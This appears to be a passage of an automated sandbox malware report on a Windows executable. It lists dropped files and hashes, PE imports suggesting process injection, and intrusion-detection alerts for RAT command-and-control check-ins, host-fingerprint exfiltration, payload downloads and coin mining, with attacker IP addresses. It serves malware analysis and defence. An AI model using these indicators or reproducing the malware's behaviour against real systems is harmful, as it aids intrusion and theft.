                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:modified
                                                                          Size (bytes):64
                                                                          Entropy (8bit):0.34726597513537405
                                                                          Encrypted:false
                                                                          SSDEEP:3:Nlll:Nll
                                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                          Malicious:false
                                                                          Preview:@...e...........................................................

                                                                          C:\Users\user\AppData\Local\Temp\DATABASE

                                                                          Download File
                                                                          Process:C:\Windows\explorer.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                          Category:dropped
                                                                          Size (bytes):51200
                                                                          Entropy (8bit):0.8745947603342119
                                                                          Encrypted:false
                                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                          Malicious:false
                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ax2swl2.5sg.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cocdc2zo.t5y.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dfi33f40.guj.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_djsexaet.vla.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mvqxcnws.ruv.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_omwqgihm.dxv.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uawy2o2h.du3.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zxydq1nb.qq0.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\ggbfqxmgkimt.sys

                                                                          Download File
                                                                          Process:C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe
                                                                          File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):14544
                                                                          Entropy (8bit):6.2660301556221185
                                                                          Encrypted:false
                                                                          SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                          MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                          SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                          SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                          SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 5%
                                                                          Joe Sandbox View:
                                                                          • Filename: nlGOh9K5X5.exe, Detection: malicious, Browse
                                                                          • Filename: LfHJdrALlh.exe, Detection: malicious, Browse
                                                                          • Filename: iKvzvknzW1.exe, Detection: malicious, Browse
                                                                          • Filename: 2zirzlMVqX.bat, Detection: malicious, Browse
                                                                          • Filename: DM6vAAgoCw.exe, Detection: malicious, Browse
                                                                          • Filename: f5TWdT5EAc.exe, Detection: malicious, Browse
                                                                          • Filename: luQ2wBh8q6.exe, Detection: malicious, Browse
                                                                          • Filename: lokigod.exe, Detection: malicious, Browse
                                                                          • Filename: nfkciRoR4j.exe, Detection: malicious, Browse
                                                                          • Filename: File.exe, Detection: malicious, Browse
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                                                                          Static File Info

                                                                          General

                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Entropy (8bit):6.232060473751836
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                          File name:file.exe
                                                                          File size:515'584 bytes
                                                                          MD5:05bbeba85b66e05630ab53abe2f0864e
                                                                          SHA1:5181b7d8e9ec8946ad3256b1b400e2f570dae8da
                                                                          SHA256:c2ee598db573b89211027b5607fb6561742991be3b9d5ed9e413a3c3d35da01b
                                                                          SHA512:3cfaacdc097d9d2bc866bf56bdce87647496b53e76415754e7269e611dfc4fe1b94a0674041dbbb24ab4366ae171fb3e1bdb1074b8eaf31f7f625a308c19da75
                                                                          SSDEEP:6144:BRHP4vL3s5+CM6OW0nUBiwCCWfS34mbWMkRONOgbBpiEVBHl8ba2z7OBiL:BRHP63srM6AbCWfS34mSMkrCpPFBC
                                                                          TLSH:20B49F10E6A0C026D0A5507597FAC3379924BE325B0158D7BBE1FF6A1E355F2AE3072B
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........W...9...9...9.......9..U....9.......9.......9...8.K.9..U....9..U....9..U....9..U....9..U....9.Rich..9........................

                                                                          File Icon

                                                                          Icon Hash:00928e8e8686b000

                                                                          Static PE Info

                                                                          General

                                                                          Entrypoint:0x42626c
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x6736E596 [Fri Nov 15 06:09:26 2024 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:5
                                                                          OS Version Minor:1
                                                                          File Version Major:5
                                                                          File Version Minor:1
                                                                          Subsystem Version Major:5
                                                                          Subsystem Version Minor:1
                                                                          Import Hash:22619f424fdceb139f88e36aa82b184d

                                                                          Entrypoint Preview

                                                                          Instruction
                                                                          call 00007F73E0DA3183h
                                                                          jmp 00007F73E0D9DF2Eh
                                                                          pxor xmm0, xmm0
                                                                          push ecx
                                                                          push ebx
                                                                          mov eax, ecx
                                                                          and eax, 0Fh
                                                                          test eax, eax
                                                                          jne 00007F73E0D9E121h
                                                                          mov eax, edx
                                                                          and edx, 7Fh
                                                                          shr eax, 07h
                                                                          je 00007F73E0D9E0D9h
                                                                          lea esp, dword ptr [esp+00000000h]
                                                                          movdqa dqword ptr [ecx], xmm0
                                                                          movdqa dqword ptr [ecx+10h], xmm0
                                                                          movdqa dqword ptr [ecx+20h], xmm0
                                                                          movdqa dqword ptr [ecx+30h], xmm0
                                                                          movdqa dqword ptr [ecx+40h], xmm0
                                                                          movdqa dqword ptr [ecx+50h], xmm0
                                                                          movdqa dqword ptr [ecx+60h], xmm0
                                                                          movdqa dqword ptr [ecx+70h], xmm0
                                                                          lea ecx, dword ptr [ecx+00000080h]
                                                                          dec eax
                                                                          jne 00007F73E0D9E072h
                                                                          test edx, edx
                                                                          je 00007F73E0D9E0D9h
                                                                          mov eax, edx
                                                                          shr eax, 04h
                                                                          je 00007F73E0D9E0B1h
                                                                          jmp 00007F73E0D9E0A5h
                                                                          lea ecx, dword ptr [ecx+00h]
                                                                          movdqa dqword ptr [ecx], xmm0
                                                                          lea ecx, dword ptr [ecx+10h]
                                                                          dec eax
                                                                          jne 00007F73E0D9E098h
                                                                          and edx, 0Fh
                                                                          je 00007F73E0D9E0BEh
                                                                          mov eax, edx
                                                                          xor ebx, ebx
                                                                          shr edx, 02h
                                                                          je 00007F73E0D9E0AAh
                                                                          mov dword ptr [ecx], ebx
                                                                          lea ecx, dword ptr [ecx+04h]
                                                                          dec edx
                                                                          jne 00007F73E0D9E09Ah
                                                                          and eax, 03h
                                                                          je 00007F73E0D9E0A8h
                                                                          mov byte ptr [ecx], bl
                                                                          inc ecx
                                                                          dec eax
                                                                          jne 00007F73E0D9E09Ch
                                                                          pop ebx
                                                                          pop eax
                                                                          ret
                                                                          mov ebx, eax
                                                                          neg ebx
                                                                          add ebx, 10h
                                                                          sub edx, ebx
                                                                          xor eax, eax
                                                                          push edx
                                                                          mov edx, ebx
                                                                          and edx, 03h
                                                                          je 00007F73E0D9E0A8h
                                                                          mov byte ptr [ecx], al
                                                                          inc ecx
                                                                          dec edx
                                                                          jne 00007F73E0D9E09Ch
                                                                          shr ebx, 02h
                                                                          je 00007F73E0D9E0AAh
                                                                          mov dword ptr [ecx], eax
                                                                          lea ecx, dword ptr [ecx+04h]
                                                                          dec ebx
                                                                          jne 00007F73E0D9E09Ah
                                                                          pop edx
                                                                          jmp 00007F73E0D9DFFAh
                                                                          push 0000000Ah
                                                                          call dword ptr [00000000h]

                                                                          Rich Headers

                                                                          Programming Language:
                                                                          • [C++] VS2010 build 30319
                                                                          • [ASM] VS2010 SP1 build 40219
                                                                          • [ C ] VS2008 SP1 build 30729
                                                                          • [IMP] VS2008 SP1 build 30729
                                                                          • [C++] VS2010 SP1 build 40219
                                                                          • [ C ] VS2010 SP1 build 40219
                                                                          • [EXP] VS2010 SP1 build 40219
                                                                          • [RES] VS2010 SP1 build 40219
                                                                          • [LNK] VS2010 SP1 build 40219

                                                                          Data Directories

                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x3b4000x186.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x3a8d40x64.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x800000x2f0.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x810000x2fdc.reloc
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x39cd00x40.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x320000x20c.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                          Sections

                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x10000x30fd90x310005278cc0f00bc7828a0b5c5174b9a6df0False0.46397680165816324data6.30267168485894IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                          .rdata0x320000x95860x9600b90f48a1cd432420536571947f4afcd2False0.323828125data5.558651620039406IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .data0x3c0000x434c00x3f2009993e05992b14ea422c39af0b8b723f9False0.591224474009901data5.743039217047035IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .rsrc0x800000x2f00x400c4eb949748397a397333067900fa993bFalse0.390625data4.267322939320033IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .reloc0x810000x3df40x3e006b64b7bd321132acabd8b51798deda1cFalse0.6132182459677419data5.879074642442366IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                          Resources

                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                          RT_MANIFEST0x800600x290XML 1.0 document, ASCII text, with CRLF line terminators0.5365853658536586

                                                                          Imports

                                                                          DLLImport
                                                                          KERNEL32.dllOpenMutexW, GetLastError, OpenEventW, Wow64DisableWow64FsRedirection, ExitProcess, lstrcpyA, lstrcpyW, GetModuleHandleW, LocalFree, lstrcmpiW, CreateThread, GetProcessHeap, IsWow64Process, GetCurrentProcess, GetProcAddress, VirtualFree, CloseHandle, WaitForSingleObject, ReadFile, GetFileSize, CreateFileW, FreeLibrary, LoadLibraryW, lstrlenW, InterlockedDecrement, GetSystemDirectoryW, GetWindowsDirectoryW, GetModuleFileNameW, LocalAlloc, DeleteFileW, WriteFile, CreateDirectoryW, Sleep, GetCommandLineW, LoadLibraryA, VirtualAlloc, RemoveDirectoryW, CreateEventW, SetEvent, ResumeThread, CreateMutexW, lstrlenA, WaitForMultipleObjects, ReleaseMutex, GetModuleHandleA, TerminateThread, GetExitCodeThread, GetNativeSystemInfo, FindClose, FindNextFileW, lstrcmpW, FindFirstFileW, VirtualProtect, GetTickCount, GetComputerNameExW, GetUserGeoID, GetCurrentProcessId, GetFileAttributesExW, HeapReAlloc, WriteConsoleW, SetStdHandle, GetStringTypeW, LCMapStringW, HeapSize, FlushFileBuffers, MultiByteToWideChar, LeaveCriticalSection, EnterCriticalSection, GetConsoleMode, GetConsoleCP, SetFilePointer, GetSystemTimeAsFileTime, QueryPerformanceCounter, DeleteCriticalSection, GetFileType, InitializeCriticalSectionAndSpinCount, RtlUnwind, RaiseException, HeapAlloc, HeapFree, GetCommandLineA, HeapSetInformation, GetStartupInfoW, IsProcessorFeaturePresent, DecodePointer, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EncodePointer, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, GetStdHandle, HeapCreate, GetModuleFileNameA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount
                                                                          USER32.dllwsprintfW, CreateWindowExW, GetForegroundWindow, SetWindowTextW, MessageBoxW, DefWindowProcW, RegisterClassW, GetMessageW, TranslateMessage, DispatchMessageW, DestroyWindow, UnregisterClassW, PostMessageW, wsprintfA
                                                                          ole32.dllCoCreateInstance
                                                                          OLEAUT32.dllVariantClear, VariantInit, SysFreeString, SysAllocString

                                                                          Exports

                                                                          NameOrdinalAddress
                                                                          GetModuleHandle6410x405ac0
                                                                          GetProcAddress6420x406090
                                                                          GetThreadContext6430x406690
                                                                          ReadProcessMemory6440x4064b0
                                                                          SetLastErrorFromX64Call50x406010
                                                                          SetThreadContext6460x406740
                                                                          VirtualAllocEx6470x406230
                                                                          VirtualFreeEx6480x406310
                                                                          VirtualProtectEx6490x4063e0
                                                                          VirtualQueryEx64100x406160
                                                                          WriteProcessMemory64110x4065a0
                                                                          X64Call120x405750

                                                                          Network Behavior

                                                                          Suricata IDS Alerts

                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                          2024-12-08T15:07:05.208895+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.649709185.157.162.2165200TCP
                                                                          2024-12-08T15:07:07.080523+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649708154.216.20.243443TCP
                                                                          2024-12-08T15:07:08.889565+01002045619ET MALWARE Win32/DarkVision RAT CnC Checkin M31192.168.2.649709185.157.162.2165200TCP
                                                                          2024-12-08T15:07:10.584306+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.649711185.157.162.2165200TCP
                                                                          2024-12-08T15:07:12.250453+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649707154.216.20.243443TCP
                                                                          2024-12-08T15:07:13.260349+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.649714185.157.162.2165200TCP
                                                                          2024-12-08T15:07:15.937042+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.649721185.157.162.2165200TCP
                                                                          2024-12-08T15:07:17.220795+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649712154.216.20.243443TCP
                                                                          2024-12-08T15:07:18.615476+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.649728185.157.162.2165200TCP
                                                                          2024-12-08T15:07:22.050459+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.649737185.157.162.2165200TCP
                                                                          2024-12-08T15:07:25.102418+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649738154.216.20.243443TCP
                                                                          2024-12-08T15:07:25.184321+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.649750185.157.162.2165200TCP
                                                                          2024-12-08T15:07:25.236284+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649715154.216.20.243443TCP
                                                                          2024-12-08T15:07:31.856449+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649756154.216.20.243443TCP
                                                                          2024-12-08T15:07:32.539004+01002022482ET MALWARE JS/Nemucod requesting EXE payload 2016-02-011192.168.2.649756154.216.20.243443TCP
                                                                          2024-12-08T15:07:32.823322+01002021954ET MALWARE JS/Nemucod.M.gen downloading EXE payload1154.216.20.243443192.168.2.649756TCP
                                                                          2024-12-08T15:07:33.500244+01002036289ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)2192.168.2.6641911.1.1.153UDP
                                                                          2024-12-08T15:07:37.726614+01002044697ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M31192.168.2.649774154.216.20.243443TCP
                                                                          2024-12-08T15:07:46.373548+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649775154.216.20.243443TCP
                                                                          2024-12-08T15:07:54.212031+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649804154.216.20.243443TCP
                                                                          2024-12-08T15:08:10.944741+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649823154.216.20.243443TCP
                                                                          2024-12-08T15:08:14.300884+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649857154.216.20.243443TCP
                                                                          2024-12-08T15:08:24.349906+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.649882185.157.162.2165200TCP
                                                                          2024-12-08T15:08:28.783097+01002045619ET MALWARE Win32/DarkVision RAT CnC Checkin M31192.168.2.649882185.157.162.2165200TCP
                                                                          2024-12-08T15:08:30.530981+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.649894185.157.162.2165200TCP
                                                                          2024-12-08T15:08:33.203418+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.649903185.157.162.2165200TCP
                                                                          2024-12-08T15:08:35.870874+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.649909185.157.162.2165200TCP
                                                                          2024-12-08T15:08:38.982183+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.649916185.157.162.2165200TCP
                                                                          2024-12-08T15:08:41.654103+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.649922185.157.162.2165200TCP
                                                                          2024-12-08T15:08:44.324382+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.649930185.157.162.2165200TCP
                                                                          2024-12-08T15:09:47.046507+01002051004ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request2192.168.2.650012154.216.20.243443TCP
                                                                          2024-12-08T15:09:48.823823+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.650014185.157.162.2165200TCP
                                                                          2024-12-08T15:09:53.265747+01002045619ET MALWARE Win32/DarkVision RAT CnC Checkin M31192.168.2.650014185.157.162.2165200TCP
                                                                          2024-12-08T15:09:55.147311+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.650015185.157.162.2165200TCP
                                                                          2024-12-08T15:09:57.816864+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.650016185.157.162.2165200TCP
                                                                          2024-12-08T15:10:00.934674+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.650017185.157.162.2165200TCP
                                                                          2024-12-08T15:10:03.604087+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.650018185.157.162.2165200TCP
                                                                          2024-12-08T15:10:06.279386+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.650019185.157.162.2165200TCP
                                                                          2024-12-08T15:10:08.950916+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.650020185.157.162.2165200TCP
                                                                          2024-12-08T15:10:42.374133+01002051004ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request2192.168.2.650021154.216.20.243443TCP
                                                                          2024-12-08T15:11:13.508924+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.650023185.157.162.2165200TCP
